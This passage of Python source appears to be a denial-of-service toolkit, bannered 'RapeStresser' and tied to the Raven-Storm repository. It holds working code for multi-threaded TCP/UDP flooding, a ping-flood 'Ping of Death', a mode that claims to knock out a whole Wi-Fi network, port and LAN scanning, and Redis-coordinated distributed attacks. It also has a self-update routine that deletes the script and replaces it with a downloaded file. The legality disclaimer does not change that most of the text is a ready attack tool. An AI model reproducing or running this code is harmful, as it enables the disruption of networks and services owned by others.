elif listinglister[0] == "podthreads":
if podthreadslister == 0:
podthreads = listinglister[1]
podthreadslisterstandard = listinglister[1]
podthreadslister = int(listinglister[2])
elif int(listinglister[2]) > int(podthreadslister):
podthreads = listinglister[1]
podthreadslisterstandard = listinglister[1]
podthreadslister = int(listinglister[2])
elif listinglister[0] == "podsleep":
if podsleeplister == 0:
podsleep = listinglister[1]
podsleeplisterstandard = listinglister[1]
podsleeplister = int(listinglister[2])
elif int(listinglister[2]) > int(podsleeplister):
podsleep = listinglister[1]
podsleeplisterstandard = listinglister[1]
podsleeplister = int(listinglister[2])
elif listinglister[0] == "podinterval":
if podintervallister == 0:
podinterval = listinglister[1]
podintervallisterstandard = listinglister[1]
podintervallister = int(listinglister[2])
elif int(listinglister[2]) > int(podintervallister):
podinterval = listinglister[1]
podintervallisterstandard = listinglister[1]
podintervallister = int(listinglister[2])
elif listinglister[0] == "podautodl":
if podautodllister == 0:
podautodl = listinglister[1]
podautodllisterstandard = listinglister[1]
podautodllister = int(listinglister[2])
elif int(listinglister[2]) > int(podautodllister):
podautodl = listinglister[1]
podautodllisterstandard = listinglister[1]
podautodllister = int(listinglister[2])
except Exception as ee:
pass
def listeradd(where, value, lister):
try:
coni = False
nnn = 0
for zw, l in enumerate(lister):
if l[1] == value:
coni = True
nnn = zw
if coni:
for zw, l in enumerate(lister):
if zw == nnn:
l[2] += l[2]
else:
lister.insert(0, [where, value, 1])
return lister
except:
return lister
argvexit = False
try:
if "-ros" in sys.argv:
runcomonstart = " ".join(sys.argv).split("-ros ")[1].split(" -")[0].split(", ")
except Exception as e:
print("Error", e)
argvexit = True
#red
try:
if "-dred" in sys.argv:
os.system("for key in $(redis-cli -p 6379 keys \\*); do echo \"Key : '$key'\" ; redis-cli -p 6379 GET $key; done")
argvexit = True
except:
pass
# config file
try:
if "-c" in sys.argv:
conffile = " ".join(sys.argv).split("-c")[1][1:].split(" ")[0]
if os.path.isfile(conffile):
for g in open(conffile, "r").read().split("\n"):
if "" != g:
try:
i = ""
i = g.split(" = ")
if verbosed:
print(i[0], i[1])
if i[0] == "ip":
ip = str(i[1])
elif i[0] == "port":
port = int(i[1])
elif i[0] == "threads":
threads = int(i[1])
elif i[0] == "message":
messages = str(i[1])
elif i[0] == "repeat":
messages = (messages * i[1])
elif i[0] == "sleep":
sleepy = float(i[1])
elif i[0] == "output":
messages = str(i[1])
elif i[0] == "stress":
stress = str(i[1])
elif i[0] == "stressstep":
stressstep = int(i[1])
elif i[0] == "mb":
rtxt = int(int(setmb) / 0.000001)
elif i[0] == "autostart":
autostart = int(i[1])
elif i[0] == "autostop":
autostop = int(i[1])
elif i[0] == "autostep":
autostep = int(i[1])
elif i[0] == "hip":
hip = str(i[1])
elif i[0] == "hport":
hport = int(i[1])
elif i[0] == "runonstart":
runcomonstart = i[1].split(", ")
elif i[0] == "method":
socketmethod = str(i[1])
elif i[0] == "pod target":
podtarget = i[1]
elif i[0] == "pod threads":
podthreads = int(i[1])
elif i[0] == "pod size":
podsize = int(i[1])
elif i[0] == "pod sleep":
podsleep = float(i[1])
elif i[0] == "pod interval":
podinterval = int(i[1])
elif i[0] == "pod auto stop":
podautodl = int(i[1])
except Exception as i:
print("Error:", i)
argvexit = True
else:
print("No such config file.", conffile)
argvexit = True
except:
pass
if argvexit:
sys.exit()
if verbosed:
raw_input("")
os.system("clear")
print("Starting...")
# Update
print("Checking for updates...")
print("Current version: %s" % rsversion)
checkstatusofrepository = ""
if verbosed:
print("[Check: Version]")
try:
checkstatusofrepository = urllib2.urlopen("https://github.com/Taguar258/Raven-Storm/wiki/Version").read()
time.sleep(0.2)
if not ("Version:%s" % rsversion) in checkstatusofrepository:
print("")
print("There is a new version, feel free to update it:")
print("")
updateresult = re.search('Info:(.*):Info', checkstatusofrepository)
print(updateresult.group(1).replace("\\n", "\n"))
print("")
try:
raw_input("[Press enter]")
except:
pass
except:
pass
def inporarg(label, comname, com):
if verbosed: print("[INPUT or ARGUMENT]")
if verbosed: print("[Lable: %s]" % label)
if verbosed: print("[ComName: %s]" % comname)
if verbosed: print("[Com: %s]" % com)
if verbosed: print("[%s]" % com.split("%s " % comname))
if len(com.split("%s " % comname)) == 2:
if verbosed: print("[ONLY 2 LEN]")
if com.split("%s " % comname)[1] == "":
if verbosed: print("[2 LEN BLANC]")
zw = raw_input("\033[1;32;40m %s: " % label)
else:
if verbosed: print("[2 LEN not Blanc]")
zw = com.split("%s " % comname)[1]
print("\033[1;32;40m %s: %s" % (label, zw))
else:
if verbosed: print("[ONLY 1 or more LEN: %s]" % len(com.split("%s " % comname)))
zw = raw_input("\033[1;32;40m %s: " % label)
if verbosed: print("[Return: %s]" % zw)
return zw
def checkipexists(ip, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((str(ip), int(port)))
if result == 0:
return True
else:
return False
except:
return False
def redisinbackground():
os.system("redis-server > /dev/null")
def hbi(ip):
return(" %s" % socket.gethostbyname(ip))
def speedtest(url):
try:
if not "http" in url or not "://" in url:
url = ("https://%s" % url)
print(" Test starting...")
start = time.time()
response = urllib2.urlopen(url)
webcontent = response.read()
end = time.time()
result = (end - start)
return result
except Exception as e:
return ("Error: %s" % e)
def speedping(ip):
try:
print(" Test starting...")
start = time.time()
os.system("ping -c 1 %s > /dev/null" % ip)
end = time.time()
result = (end - start)
return result
except Exception as e:
return ("Error: %s" % e)
def podtesting(size, target, threads, threadssleep, podinterval, podautodl):
targets = []
feat = ""
if podinterval != 0:
feat += ("-i %s " % podinterval)
if podautodl != 0:
feat += ("-w %s " % podautodl)
if type(target) is list:
targets = target
else:
targets = [target]
target = targets
killcom = ('sudo ping -f -q -s %s %s %s > /dev/null' % (size, feat, target)).replace(" ", " ")
print(killcom)
def layerseventhreadrequest():
global layerseventarget
global layerseveninterval
while True:
try:
urllib2.urlopen(urllib2.Request(str(layerseventarget)))
print("Request was send")
except:
print("Error while trying to request the site")
time.sleep(layerseveninterval)
def layersevenattack(layersevenmethod, layerseventarget, layerseventhreads, layersevensleep):
print(" Starting...")
print(" Stop the attack using: crtl + z")
time.sleep(3)
if layersevenmethod[0] == "REQUEST":
for thread in range(layerseventhreads):
Thread(target="layerseventhreadrequest").start()
time.sleep(layersevensleep)
def pod(size, target, threads, threadssleep, podinterval, podautodl):
print("Running...\n[Enter ctrl + z to stop the attack]")
targets = []
feat = ""
if podinterval != 0:
feat += ("-i %s " % podinterval)
if podautodl != 0:
feat += ("-w %s " % podautodl)
if type(target) is list:
targets = target
else:
targets = [target]
target = ""
for target in targets:
if os.geteuid()==0:
print("Sudo mode.")
killcom = ('sudo ping -f -q -s %s %s %s > /dev/null' % (size, feat, target)).replace(" ", " ")
else:
print("Normal mode.")
killcom = ("ping -q -s %s %s %s > /dev/null" % (size, feat, target)).replace(" ", " ")
if verbosed:
print(killcom)
try:
for i in range(int(threads)):
os.system(killcom)
time.sleep(float(threadssleep))
except KeyboardInterrupt:
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
except Exception as pingerror:
print("Error.", pingerror)
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
try:
raw_input("")
os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
except:
#os.system("killall ping")
print("\033[1;32;0mStopped.")
sys.exit()
print("Killed.")
def lanscan():
try:
gateways = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
gateways.connect(("8.8.8.8", 80))
gateway = ".".join((gateways.getsockname()[0].split("."))[:len(gateways.getsockname()[0].split(".")) - 1])
gateways.close()
nm.scan(hosts=("%s.0/24" % gateway), arguments="-sP")
lanscandev = [(x, nm[x]['status']['state'], nm[x]["hostnames"][0]["name"], nm[x]["hostnames"][0]["type"]) for x in nm.all_hosts()]
print("Gate way: %s.0" % gateway)
for lanscandevice in lanscandev:
print("%s %s %s %s" % (lanscandevice[0], lanscandevice[1], lanscandevice[2], lanscandevice[3]))
except Exception as e:
print("Error.", e)
def stresstest():
import threading
global threads
global stresstestvar
global stresserror
global runactive
print(" ")
#print("\033[1;32;40mStarting with " + str(threads) + "\033[1;32;40m threads...")
print("\033[1;32;40mTime between: %s" % str(timeforstress))
print("\033[1;32;40mUsing %s threads per round" % str(threads))
#print("\033[1;32;40mStep: " + str(stressstep))
print(" ")
#threads = 1
time.sleep(2)
while True:
if hclient:
try:
if hr.get("running") != "true":
print("Killed by server.")
sys.exit()
except:
print("Killed by server.")
sys.exit()
for w in range(1):
t = threading.Thread(target=ddos)
t.start()
time.sleep(timeforstress)
if stresserror == 'true':
print(" ")
print("\033[1;32;40mStopped at %s threads!" % (str(stresstestvar * threads))) #str(stresstestvar * threads)
print(" ")
runactive = 'false'
sys.exit()
else:
stresstestvar += 1
def scann(targetIP):
print(" ")
try:
for p in range(1, 1500):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
res = sock.connect_ex((targetIP, p))
if res == 0:
print("\033[1;32;40mPort: %s" % str(p))
sock.close()
except Exception:
print("\033[1;32;40mThere was an error.")
sys.exit()
print(" ")
print(" ")
def ddos():
global stresserror
global runactive
#message = (str(messages) * int(rtxt))
autotimer = ""
mesalready = False
message = str("%s rs" % messages)
if not outtxtmute:
print("\033[1;32;40m\nOk!")
#if socketmethod != "udp":
# mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#else:
# mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while runactive == 'true':
if hclient:
try:
if hr.get("running") != "true":
print("Killed by server.")
sys.exit()
except:
print("Killed by server.")
sys.exit()
if listwebtrue == "true":
if listportslist == "true":
for listwebnum, listwebvalue in enumerate(listweblist):
for listportsnum, listportsvalue in enumerate(listportslist):
try:
listwebtext = ("for %s " % listwebvalue)
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((listwebvalue, listportsvalue))
#else:
#mysocket.bind((listwebvalue, listportsvalue))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (listwebvalue, listportsvalue))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess for %s with port %s!" % (listwebvalue, listportsvalue))
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget %s with port %s down!, continuing..." % (listwebvalue, listportsvalue))
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
for listwebnum, listwebvalue in enumerate(listweblist):
try:
listwebtext = ("for %s " % listwebvalue)
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((listwebvalue, port))
else:
mysocket.bind((listwebvalue, port))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (listwebvalue, port))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess for %s!" % listwebvalue)
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget %s down!, continuing..." % listwebvalue)
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
if listportstrue == "true":
for listportsnum, listportsvalue in enumerate(listportslist):
try:
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((ip, listportsvalue))
else:
mysocket.bind((ip, listportsvalue))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (ip, listportsvalue))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess with port %s!" % listportsvalue)
time.sleep(sleepy)
except socket.error:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget with port %s down!, continuing..." % listportsvalue)
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
else:
try:
if socketmethod != "udp":
mysocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
else:
mysocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if socketmethod != "udp":
mysocket.connect((ip, port))
else:
mysocket.bind((ip, port))
if socketmethod != "udp":
mysocket.send(str.encode("GET %sHTTP/1.1 \r\n" % message))
mysocket.sendto(str.encode("GET %sHTTP/1.1 \r\n" % message), (ip, port))
if outtxt == 'true':
if not mesalready:
mesalready = True
print("\033[1;32;40m\nSuccess!")
time.sleep(sleepy)
except socket.error as eee:
if verbosed:
print("\033[1;31;40m\nTarget down!, continuing...", eee)
else:
if not outtxtmute:
mesalready = False
print("\033[1;31;40m\nTarget down!, continuing...")
if stress == 'true':
stresserror = 'true'
if socketmethod != "udp":
mysocket.close()
if int(autostop) != 0:
autoendtime = time.time()
autotimer = (int(autoendtime) - int(autostarttime))
#print(autoendtime)
#print(autostarttime)
#print(autotimer)
if autostop <= autotimer:
print("\033[1;32;0mAuto Stop")
sys.exit()
for i in range(threads):
try:
t = threading.Thread(target=ddos)
t.start()
except:
pass
print("\033[1;32;40m ")
os.system("clear")
print ("""\033[1;32;40m
-----------------------------------------------------------
(っ◔◡◔)っ ♥ RapeStresser ♥
Stress-Testing-Toolkit
Made by HERO-_-HACKERx! MIT 2020
I am not responsible, for your activitys!\n Or errors in the programm!
It is illegal, to use on not owned servers.
----------------------------------------------------------""")
def agreed():
global verbosed
if verbosed:
print("[Check: Agreement]")
print("")
agreement = raw_input("\033[1;32;40mDo you agree to use this tool for legal purposes only? (y/N) ")
if agreement == 'y':
if hserver:
try:
hr.set("agree", "true")
except:
sys.exit()
else:
sys.exit()
print(" ")
def helptext():
print("""\033[1;32;40m
Main:
|-- help = This help message.
|-- update = Update script.
|-- quit/exit = Quit ; Exit.
|-- values = Output all set variables.
|-- >> = Run shell command.
Layer-4:
|
|-- Main commands:
| |-- set port = Set the port.
| |-- set threads = Set the number of threads.
| |-- set ip = Set the IP.
| |-- set web = Set IP of website.
| |-- method = Set attack method: UPD, TCP.
| |-- set sleep = Set waiting time between sends.
| |-- outtxt = Output text enable/disable.
| |-- mute = Do not output connection reply.
| |-- run = To run.
|
|-- Set Send-text:
| |-- set message = Set message.
| |-- set r = Repeat text.
| |-- set mb = Send choosen amount of mb to server.
|
|-- Stress Testing:
| |-- stress = Stress-testing mode.
| |-- st wait = Time between stress tests.
|
|-- Multiple:
| |-- set listip = Use IP list to attack.
| |-- set listweb = Use website list to attack.
| |-- set listport = Attack multiple ports.
|
|-- Automation:
| |-- auto start = Time after Attack should start.
| |-- auto step = Time between next thread to activate.
| |-- auto stop = Time after attack should stop.
Layer-3:
|
|-- Main commands:
| |-- pod target = Set the target.
| |-- pod target list = Set multiple targets.
| |-- pod size = Set packet size.
| |-- pod threads = Threads to use.
| |-- pod sleep = Delay between threads.
| |-- pod interval = Delay between each packet send.
| |-- pod auto stop = Automatically stop attack after x seconds.
| |-- pod run = Run the Ping of Death.
| |-- pod jammer = Kill a whole wifi network, by targeting all.
Scaning:
|
|-- Port scanning:
| |-- get port i = Get port of IP (get port i).
| |-- get port w = Get port of web (get port w).
|
|-- Network scanning:
| |-- lan scan = Get all Ips of Wifi.
|
|-- Domain scanning:
| |-- hbi = Get the IP by host.
| |-- post scan = Get all post variables of a Website.
|
|-- Speed testing:
| |-- speed down = Return the time it needs to open a website.
| |-- speed ping = Return the time it needs to ping an IP.
DDOS:
|
|-- Main commands:
| |-- redis run = Enable the redis server.
| |-- redis run hide = Enable the redis server in background.
| |-- server start = Start a server for clients, to make your attack stronger.
| |-- client connect = Connect your client, to the host server.
| |-- server ip = Set IP of the device hosting Redis.
| |-- server port = Set the port of device hosting Redis. (Should be already set.)
|
|-- First start redis-server by entering redis-server in a new terminal.
|-- First start a server, then connect clients.
Use Fast-Usage and plenty more:
|- Have a look at the official documentation on GitHub.
To stop running attack >>> [Crtl + z]
""")
i = 1
if verbosed:
print("[Set-Check: In case ip,port,threads; argv set - set]")
try:
if "-fd" == sys.argv[1]:
try:
ip = sys.argv[2]
port = int(sys.argv[3])
threads = int(sys.argv[4])
i = 7
agreed()
print("\033[1;32;40mTo stop press: CRTL + z")
time.sleep(3)
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
except:
print("Could not start dos by given inputs.")
sys.exit()
except:
pass
try:
if "-fp" == sys.argv[1]:
try:
podtarget = sys.argv[2]
podthreads = sys.argv[3]
try:
podsize = int(sys.argv[4])
if podsizezw < podminsize:
print("Size needs to be more than 4kb.")
podsize = 65500
print("Size updated by default to 65500kb.")
elif podsizezw > podmaxsize:
print("Size needs to be less than 65500kb.")
podsize = 65500
print("Size updated by default to 65500kb.")
except:
podsize = 65500
try:
podsleep = float(sys.argv[5])
except:
podsleep = 0
print("Sleep updated by default to 0.")
try:
podinterval = int(sys.argv[6])
except:
podinterval = 0
print("interval updated by default to 0.")
try:
podautodl = int(sys.argv[7])
except:
podautodl = 0
print("Auto stop updated by default to 0.")
agreed()
pod(podsize, podtarget, podthreads, podsleep, podinterval, podautodl)
except:
print("Could not start pod by given inputs.")
sys.exit()
except:
pass
print("""\033[1;32;40m
Main Commands:
|-- help = This help message.
|-- set port = Set the port.
|-- set threads = Set the number of threads.
|-- set ip = Set the IP.
|-- set web = Set IP of website.
|-- method = Set attack method: UPD, TCP.
|-- set sleep = Set waiting time between sends in Seconds.
|-- outtxt = Output text enable/disable.
|-- values = Output all set variables.
|-- run = To run.
|-- update = Update script.
|-- quit/exit = Quit ; Exit
Enter "help" to see >much< more...!
""")
# fast redis
if verbosed:
print("[Set-Check: Redis start using argv]")
print(" ".join(sys.argv))
if 'server start' in " ".join(sys.argv):
print(" ".join(sys.argv).split("server start")[1][1:].split(" ")[:2])
elif 'client connect' in " ".join(sys.argv):
print(" ".join(sys.argv).split("client connect")[1][1:].split(" ")[:2])
else:
print("No QuickRed.")
try:
if 'server start' in " ".join(sys.argv):
argvh = " ".join(sys.argv).split("server start")[1][1:].split(" ")[:2]
try:
argvh[1] = int(argvh[1])
except:
argvh = []
com = ""
try:
try:
hr = redis.Redis(host=argvh[0], port=argvh[1], db=0)
except:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("clid", "1")
hr.set("com", "")
hr.set("onrung", "false")
hserver = True
print("\033[1;32;40m\nServer started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
elif 'client connect' in " ".join(sys.argv):
if hserver:
print("\033[1;32;40m\nCant listen, if already hosting.\n")
else:
argvh = " ".join(sys.argv).split("client connect")[1][1:].split(" ")[:2]
try:
argvh[1] = int(argvh[1])
except:
argvh = []
com = ""
try:
try:
hr = redis.Redis(host=argvh[0], port=argvh[1], db=0)
except:
hr = redis.Redis(host=hip, port=hport, db=0)
hr.set("com", "")
myclid = str(hr.get("clid"))
hr.set("clid", str(int(myclid) + 1))
hr.set(("clid" + str(myclid)), "0")
hclient = True
print("\033[1;32;40m\nClient started...\n")
except:
print("\033[1;32;40m\nCheck redis and try again.\n")
except Exception as e:
print(e)
pass
if verbosed:
raw_input("")
if verbosed:
print("[Run: Main-Loop]")
while i < 6:
if verbosed:
print("[Check: client + runmode]")
if hclient and hr.get("onrung") != "true":
try:
# wait till command got
if verbosed:
print("[Continue]")
time.sleep(0.6)
if verbosed:
print("[Check: Command]")
while True:
if hr.get("com") != "":
if verbosed:
print("[Check: client0]")
if hr.get(("clid" + str(myclid))) == "0":
print((">> " + hr.get("com") + "\n"))
com = hr.get("com").lower()
break
if hclient:
if hr.get("onrung") == "true":
if verbosed:
print("[Pass: Run-mode]")
com = "run"
break
if hclient:
if hr.get("onrung") == "true":
if verbosed:
print("[Pass: Run-mode]")
com = "run"
break
time.sleep(0.5)
# continue with getting coms
if verbosed:
print("[Set: Variables by Server]")
print("[Check: done]")
if "help" in com:
com = ""
elif "set port" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
port = int(hr.get("port"))
print(("\033[1;32;40m\nPort updated to: " + str(port) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set threads" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
threads = int(hr.get("threads"))
print(("\033[1;32;40m\nThreads updated to: " + str(threads) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set ip" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
ip = hr.get("ip")
print(("\033[1;32;40m\nIP updated to: " + ip + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set web" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
ip = hr.get("ip")
print(("\033[1;32;40m\nIP updated to: " + ip + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "get port i" in com:
com = ""
elif "get port w" in com:
com = ""
elif "pod target" in com:
com = ""
elif "pod target list" in com:
com = ""
elif "pod threads" in com:
com = ""
elif "pod sleep" in com:
com = ""
elif "pod run" in com:
com = ""
elif "lan scan" in com:
com = ""
elif "hbi" in com:
com = ""
elif "speed down" in com:
com = ""
elif "speed ping" in com:
com = ""
elif "set message" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
messages = hr.get("messages")
print(("\033[1;32;40m\nMessage updated to: " + str(messages) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "update" in com:
com = ""
elif "set r" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
rtxt = int(hr.get("rtxt"))
rtxtzw = int(hr.get("rtxtzw"))
messages = str(hr.get("messages"))
messageszw = str(hr.get("messageszw"))
print(("\033[1;32;40m\nText repeating updated to: " + str(rtxt) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set sleep" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
sleepy = int(hr.get("sleepy"))
print(("\033[1;32;40m\nSleep updated to: " + str(sleepy) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "st wait" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
timeforstress = int(hr.get("timeforstress"))
print(("\033[1;32;40m\nSleep time for stress testing updated to: " + str(timeforstress) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto step" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostep = int(hr.get("autostep"))
print(("\033[1;32;40m\nAuto step updated to: " + str(autostep) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto start" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostart = int(hr.get("autostart"))
print(("\033[1;32;40m\nAuto start updated to: " + str(autostart) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "auto stop" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
autostop = int(hr.get("autostop"))
print(("\033[1;32;40m\nAuto stop updated to: " + str(autostop) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set mb" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
setmb = float(hr.get("setmb"))
print(("\033[1;32;40m\nMB updated to: " + str(setmb) + "\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set listweb" in com or "set listip" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listweblist = hr.get("listweblist")
print(("\033[1;32;40m\nList updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "set listport" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listportslist = hr.get("listportslist")
print(("\033[1;32;40m\nList updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "method" in com:
com = ""
try:
while True:
if hr.get("sdone") == "true":
listportslist = hr.get("method")
print(("\033[1;32;40m\nMethod updated.\n"))
break
time.sleep(1)
except:
print("\033[1;32;40m\nError.\n")
elif "server ip" in com or "server port" in com:
com = ""
listwebtrue = hr.get("listwebtrue")
if verbosed:
print("[Done]")
time.sleep(0.2)
except:
try:
print("\033[1;32;40m\nFailed to get command, exit using CTRL + c.\n")
time.sleep(2)
except:
print("1;32;0m")
sys.exit()
else:
if verbosed:
print("[Else]")
if len(runcomonstart) == 0:
try:
com = raw_input("\033[1;32;40m>> ").lower()
except:
print("\033[1;32;0m")
sys.exit()
else:
try:
if verbosed:
print("[%s]" % runcomonstart[0])
com = runcomonstart[0]
print("\033[1;32;40m>> %s" % runcomonstart[0])
runcomonstart.pop(0)
if verbosed:
print(runcomonstart)
except:
print("<Error>")
if verbosed:
print("[Check: Server]")
#pdb.set_trace()
if hserver:
if verbosed:
print("[Continue]")
print("[done: False]")
hr.set("sdone", "false")
if verbosed:
print("[Commands]")
if 'help' in com:
if helphelp == 'true':
os.system('clear')
helptext()
helphelp = 'false'
if 'quit' == com or 'exit' == com or 'q' == com or 'e' == com:
os.system("clear")
print("\033[1;32;0mBye. ^^")
os.system("clear")
print("\033[1;32;0mBye. ^^")
break
i = 7
sys.exit()
elif 'set port' in com:
print(" ")
try:
portt = inporarg("Port", "set port", com)
port = int(portt)
except:
print("Error")
print(" ")
elif 'set threads' in com:
print(" ")
try:
threadss = inporarg("Number of Threads", "set threads", com)
threads = int(threadss)
print(" ")
except:
print(" ")
print("Error")
print(" ")
elif 'set ip' in com:
print(" ")
ip = inporarg("Ip", "set ip", com)
if not "." in ip:
ip = ""
print("Error")
print(" ")
listwebtrue = "false"
elif 'set web' in com:
try:
print(" ")
webtoip = inporarg("Website", "set web", com)
webtoip = webtoip.replace("http://", "")
webtoip = webtoip.replace("https://", "")
print(" ")
webtoiptxt = socket.gethostbyname(webtoip)
ip = webtoiptxt
listwebtrue = "false"
except:
print(" ")
print("Error")
print(" ")
elif 'run' == com:
if ip != "":
if ip != iplisterstandard:
lister = listeradd("ip", ip, lister)
if port != portlisterstandard:
lister = listeradd("port", port, lister)
if threads != threadslisterstandard:
lister = listeradd("threads", threads, lister)
if messages != messageslisterstandard:
lister = listeradd("messages", messages, lister)
if rtxt != rtxtlisterstandard:
lister = listeradd("rtxt", rtxt, lister)
if sleepy != sleepylisterstandard:
lister = listeradd("sleepy", sleepy, lister)
if outtxt != outtxtlisterstandard:
lister = listeradd("outtxt", outtxt, lister)
if outtxtmute != outtxtmutelisterstandard:
lister = listeradd("outtxtmute", outtxtmute, lister)
if socketmethod != socketmethodlisterstandard:
lister = listeradd("method", socketmethod, lister)
if hserver:
if hip != hiplisterstandard:
lister = listeradd("hip", hip, lister)
if hport != hportlisterstandard:
lister = listeradd("hport", hport, lister)
if verbosed:
print(str(lister))
try:
pickle.dump(lister, open("ravenstorm-automated-list.ravenstormlist", "w"))
except:
pass
if checkipexists(ip, port) or com == "run dev":
if verbosed:
print("[Command: Run]")
if hclient:
if verbosed:
print("[Client]")
print("[Reset Agreement]")
try:
hr.set("agree", "false")
except:
print("\nError.\n")
sys.exit()
while True:
try:
if hr.get("agree") == "true":
break
time.sleep(0.2)
except:
print("\nError.\n")
time.sleep(2)
if hserver:
if verbosed:
print("[Server]")
try:
time.sleep(1)
if verbosed:
print("[Set Variables]")
hr.set("com", "")
hr.set("onrung", "true")
hr.set("running", "true")
except:
print("\nError.\n")
sys.exit()
if raw_input("\nAlso use server as ddos/dos? (y/n) ") != "y":
if verbosed:
print("[Agreement]")
agreed()
raw_input("[Press Enter to stop attack]")
try:
if verbosed:
print("[Running: False]")
hr.set("running", "false")
except:
print("\nError.")
print("Please kill it manualy.\n")
else:
if verbosed:
print("[Else]")
agreed()
print("To stop: End Redis using CRTL + z ")
time.sleep(3)
time.sleep(autostart)
if stress == 'true':
i = 8
if listwebtrue == "false" and listportstrue == "false":
stresstest()
else:
print("Dont use multiple targets/ports in the Stress-testing mode.")
else:
if autostop != 0:
autostarttime = time.time()
i = 8
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
else:
if verbosed:
print("['Normal']")
if not hclient:
agreed()
print("\033[1;32;40mTo stop press: CRTL + z")
time.sleep(3)
time.sleep(autostart)
if stress == 'true':
if listwebtrue == "false" and listportstrue == "false":
stresstest()
else:
print("Dont use multiple targets/ports in the Stress-testing mode.")
else:
if autostop != 0:
autostarttime = time.time()
i = 8
for maxthreads, i in enumerate(range(threads)):
try:
t = Thread(target=ddos)
time.sleep(autostep)
t.start()
except:
print("\033[1;32;0mCould not start thread %s." % maxthreads)
else:
print("\nTarget does not exit.\n")
else:
print("\nNo ip set.\n")
elif 'get port i' in com:
try:
print(" ")
psi = inporarg("Ip", "get port i", com)
scann(psi)
except:
print("Error")
print(" ")
elif 'get port w' in com:
try:
print(" ")
psw = inporarg("Website", "get port w", com)
psww = socket.gethostbyname(psw)
scann(psww)
except:
print(" ")
print("Error")
print(" ")
elif 'set message' in com:
print(" ")
messages = inporarg("Message", "set message", com)
rtxt = 1
print(" ")
elif 'update' in com:
try:
os.system("rm -i %s" % sys.argv[0])
wget.download("https://github.com/Taguar258/Raven-Storm/blob/master/rs.pyo?raw=true")
os.system("mv rs.pyo?raw=true %s" % sys.argv[0])
except:
print("Error.")
sys.exit()
